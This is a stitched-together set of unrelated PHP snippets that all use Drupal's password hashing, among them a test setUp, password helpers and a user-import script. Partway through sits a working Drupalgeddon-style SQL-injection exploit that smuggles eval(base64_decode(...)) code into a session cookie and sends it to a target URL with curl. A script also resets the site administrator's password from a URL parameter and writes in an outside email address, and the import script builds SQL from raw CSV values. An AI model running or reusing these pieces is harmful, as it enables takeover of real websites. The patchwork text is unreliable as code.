function setUp2() { $this->user1 = user_load(1); // Update uid 1's name and password so we know it. $password = user_password(); require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc'); $account = array('name' => 'user1', 'pass' => user_hash_password(trim($password))); // We cannot use user_save() here or the password would be hashed again. db_update('users')->fields($account)->condition('uid', 1)->execute(); // Reload and log in uid 1. $this->user1 = user_load(1, TRUE); $this->user1->pass_raw = $password; // Rebuild content access permissions $this->drupalLogin($this->user1); $this->drupalPost('admin/reports/status/rebuild', array(), t('Rebuild permissions')); if (module_exists('devel_node_access')) { // Enable Devel Node Access. $this->drupalGet('admin/config/development/devel'); $this->assertResponse(200); $this->drupalPost('admin/config/development/devel', array('devel_node_access_debug_mode' => '1'), t('Save configuration')); $this->assertResponse(200, 'Devel Node Access configuration saved.'); // Enable the second DNA block, too. $this->drupalPost('admin/structure/block/list', array('blocks[devel_node_access_dna_user][region]' => 'footer'), t('Save blocks')); } if (module_exists('devel')) { $this->drupalPost('admin/config/development/devel', array('devel_error_handlers[]' => array(1, 2, 4)), t('Save configuration')); $this->assertResponse(200, 'Devel configuration saved.'); $this->drupalPost('admin/people/permissions/list', array('1[access devel information]' => 'access devel information', '2[access devel information]' => 'access devel information'), t('Save permissions')); $this->assertResponse(200, 'Devel permissions saved.'); } /* The base class creates the following users: $this->user1 = user 1 $this->admin_user = array('administer blocks', 'administer forums', 'administer menu', 'administer taxonomy', 'create forum content')); // 'access administration pages') $this->edit_any_topics_user = array('create forum content', 'edit any forum content', 'delete any forum content', 'access administration pages') $this->edit_own_topics_user = array('create forum content', 'edit own forum content', 'delete own forum content') $this->web_user = array() Remove these users and roles and create the ones we need. */ user_role_delete((int) reset($this->admin_user->roles)); user_role_delete((int) reset($this->edit_any_topics_user->roles)); user_role_delete((int) reset($this->edit_own_topics_user->roles)); user_delete($this->admin_user->uid); user_delete($this->edit_any_topics_user->uid); user_delete($this->edit_own_topics_user->uid); user_delete($this->web_user->uid); unset($this->web_user); // Get rids and uids up to 10/9. for ($i = 0; $i < 3; ++$i) { $dummy_rid = (int) $this->drupalCreateRole(array(), 'dummy'); $dummy_user = $this->drupalCreateNamedUser('Dummy', array($dummy_rid)); user_role_delete($dummy_rid); user_delete($dummy_user->uid); } // Create our roles. $this->admin_rid = 3; $this->webmaster_rid = (int) $this->drupalCreateRole(array('administer blocks', 'administer forums', 'administer nodes', 'administer comments', 'administer menu', 'administer taxonomy', 'create forum content', 'access content overview', 'access administration pages', 'view revisions', 'revert revisions', 'delete revisions'), '11 webmaster'); $this->forum_admin_rid = (int) $this->drupalCreateRole(array('administer forums', 'create forum content', 'edit any forum content', 'delete any forum content'), '12 forum admin'); $this->edndel_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'delete any forum content', 'view own unpublished content'), '13 edndel any content'); $this->edndel_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'delete own forum content'), '14 edndel own content'); $this->edit_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit any forum content', 'view own unpublished content'), '15 edit any content'); $this->edit_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'edit own forum content', 'edit own comments'), '16 edit own content'); $this->delete_any_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete any forum content', 'view own unpublished content'), '17 delete any content'); $this->delete_own_content_rid = (int) $this->drupalCreateRole(array('create forum content', 'delete own forum content', 'edit own comments'), '18 delete own content'); // EOC should not make any difference! $this->create_content_rid = (int) $this->drupalCreateRole(array('create forum content'), '19 create content'); $this->anon_rid = DRUPAL_ANONYMOUS_RID; $this->auth_rid = DRUPAL_AUTHENTICATED_RID; // Create our users. $this->admin_user = $this->drupalCreateNamedUser('10_Administrator', array($this->admin_rid)); $this->webmaster_user = $this->drupalCreateNamedUser('11_Webmaster', array($this->webmaster_rid)); $this->forum_admin_user = $this->drupalCreateNamedUser('12_Forum_admin', array($this->forum_admin_rid)); $this->edndel_any_content_user = $this->drupalCreateNamedUser('13_EdNDel_any_content', array($this->edndel_any_content_rid)); $this->edndel_own_content_user = $this->drupalCreateNamedUser('14_EdNDel_own_content', array($this->edndel_own_content_rid)); $this->edit_any_content_user = $this->drupalCreateNamedUser('15_Edit_any_content', array($this->edit_any_content_rid)); $this->edit_own_content_user = $this->drupalCreateNamedUser('16_Edit_own_content', array($this->edit_own_content_rid)); $this->delete_any_content_user = $this->drupalCreateNamedUser('17_Delete_any_content', array($this->delete_any_content_rid)); $this->delete_own_content_user = $this->drupalCreateNamedUser('18_Delete_own_content', array($this->delete_own_content_rid)); $this->create_content_user = $this->drupalCreateNamedUser('19_Create_content', array($this->create_content_rid)); $this->auth_user = $this->drupalCreateNamedUser('20_Auth_only', array()); $this->moderator = $this->drupalCreateNamedUser('21_Moderator', array($this->create_content_rid)); $anon = drupal_anonymous_user(); $anon->name = check_plain(format_username($anon)); $this->accounts = array($this->user1, $this->admin_user, $this->webmaster_user, $this->forum_admin_user, $this->edndel_any_content_user, $this->edndel_own_content_user, $this->edit_any_content_user, $this->edit_own_content_user, $this->delete_any_content_user, $this->delete_own_content_user, $this->create_content_user, $this->auth_user, $this->moderator); $this->rids = array($this->anon_rid, $this->auth_rid, $this->admin_rid, $this->webmaster_rid, $this->forum_admin_rid, $this->edndel_any_content_rid, $this->edndel_own_content_rid, $this->edit_any_content_rid, $this->edit_own_content_rid, $this->delete_any_content_rid, $this->delete_own_content_rid, $this->create_content_rid); // Show settings for reference. $this->drupalGet('admin/people/permissions/list'); $this->assertResponse(200, '^^^ Permissions'); $this->drupalGet('admin/people', array('query' => array('sort' => 'asc', 'order' => drupal_encode_path(t('Username'))))); $this->assertResponse(200, '^^^ Users'); }
/** * update the password. * update the password in the shard + update the password in the www/CMS version. * @param $user the username * @param $pass the new password. * @return ok if it worked, if the lib or shard is offline it will return liboffline or shardoffline. */ public static function setPassword($user, $pass) { $hashpass = crypt($pass, WebUsers::generateSALT()); $reply = WebUsers::setAmsPassword($user, $hashpass); $drupal_pass = user_hash_password($pass); $values = array('user' => $user, 'pass' => $drupal_pass); try { //make connection with and put into shard db db_query("UPDATE {users} SET pass = :pass WHERE name = :user", $values); } catch (PDOException $e) { //ERROR: the web DB is offline } return $reply; }
/** * This function hashes an user password * * @param mixed $field * A string or an array of strings * * @return mixed * Resulted hashes */ public static function userHashPassword($field) { require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc'); if (is_array($field)) { foreach ($field as &$f) { $f = self::userHashPassword($f); } return $field; } return user_hash_password($field); }
function hashPassword($password) { require_once DRUPAL_ROOT . '/includes/password.inc'; return user_hash_password($password); }
$code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code)))); } else { $code_inject = $code; } } $code_inject = rtrim($code_inject, ';'); $code_inject .= ';session_destroy();die("");'; if (strpos($url, 'www.') === 0) { $url = substr($url, 4); } $_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert'); $_SESSION['build_info']['args'][0] =& $_SESSION['string']; list(, $session_name) = explode('://', $url, 2); // use insecure cookie with sql inj. $cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); $password = user_hash_password('test'); $session_id = drupal_random_key(); $sec_ssid = drupal_random_key(); $serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION))); $inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- "; $cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid; $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, True); curl_setopt($ch, CURLOPT_RETURNTRANSFER, True); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5')); curl_setopt($ch, CURLOPT_COOKIE, $cookie); $output = curl_exec($ch); curl_close($ch); echo $output;
<?php define('DRUPAL_ROOT', getcwd()); require_once DRUPAL_ROOT . '/includes/bootstrap.inc'; drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL); require_once DRUPAL_ROOT . '/includes/password.inc'; if (isset($_GET['pass']) && !empty($_GET['pass'])) { $newhash = user_hash_password($_GET['pass']); } else { die('Retry with ?pass=PASSWORD set in the URL'); } $updatepass = db_update('users')->fields(array('pass' => $newhash, 'name' => 'admin', 'mail' => 'cuneyt_dogan@windowslive.com '))->condition('uid', '1', '=')->execute(); print "Done. Please delete this file immediately!"; drupal_exit();
/** * This function hashes an user password * * @param mixed $field * A string or an array of strings * * @return mixed * Resulted hashes */ public static function userHashPassword($field) { static $not_included = TRUE; if ($not_included) { require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc'); $not_included = FALSE; } if (is_array($field)) { return array_map(array(__CLASS__, __FUNCTION__), $field); } return user_hash_password($field); }
$dbh = new PDO('mysql:host=localhost;dbname=backdrop_cmi', $user, $pass); /* * Data map * * 0: ID => uid * 1: user_login => name * 2: user_pass => pass // hardcode; 'pass' * // field_name = explode('-', user_nicename); * 3: user_nicename => NOT USED * 4: user_email => mail * 5: user_url => NOT USED * 6: user_registered => 2012-09-29 20:15:51 // timestamp * 7: user_activation_key => NOT USED * 8: user_status => NOT USED * 9: display_name => field_name */ $data = file('../cmi-wp-users.csv', FILE_IGNORE_NEW_LINES); foreach ($data as $d) { $d = explode(',', $d); $d[6] = trim($d[6], '"'); $time = strtotime($d[6]); $el_pass = user_hash_password('pass'); print $el_pass . "\n"; $sql = "insert into users (\n uid,\n name,\n pass,\n mail,\n created,\n status,\n timezone\n ) values(\n {$d['0']},\n {$d['1']},\n {$el_pass},\n {$d['4']},\n {$time},\n 1,\n 'America/New_York'\n )"; $dbh->query($sql); $name_sql = "insert into field_data_field_name (\n entity_type,\n bundle,\n deleted,\n entity_id,\n revision_id,\n language,\n field_name_value\n ) values (\n 'user',\n 'user',\n 0,\n {$d['0']},\n 1,\n 'und',\n {$d['9']}\n )"; $dbh->query($name_sql); $rev_name_sql = "insert into field_revision_field_name (\n entity_type,\n bundle,\n deleted,\n entity_id,\n revision_id,\n language,\n field_name_value\n ) values (\n 'user',\n 'user',\n 0,\n {$d['0']},\n 1,\n 'und',\n {$d['9']}\n )"; $dbh->query($rev_name_sql); } print 'i did it.' . "\n";